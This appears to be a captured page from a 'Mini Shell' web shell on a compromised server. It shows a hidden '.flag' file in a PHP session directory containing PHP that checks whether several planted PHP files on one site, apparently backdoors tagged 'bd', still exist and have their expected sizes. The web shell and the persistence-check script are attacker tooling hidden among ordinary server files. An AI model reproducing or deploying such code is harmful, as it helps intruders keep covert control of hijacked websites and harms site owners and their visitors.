Mini Shell

Direktori : /opt/alt/php81/var/lib/php/session/
Upload File :
Current File : //opt/alt/php81/var/lib/php/session/.flag

<?php   $r = '/home/ukubnwwt/airlev8.com'; $x = ["/zohoverify/xoopsstory.php"=>"bd@@213954@@64",
"/comingsoon_files/htaccess.php"=>"bd@@214532@@49",
"/.well-known/oracle8.php"=>"bd@@214547@@1989",
"/rester/index.php"=>"bd@@204411@@reverse_lookup",
"/zohoverify/xoopsstory.php"=>"bd@@211654@@709",
"/comingsoon_files/htaccess.php"=>"bd@@213976@@1549"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');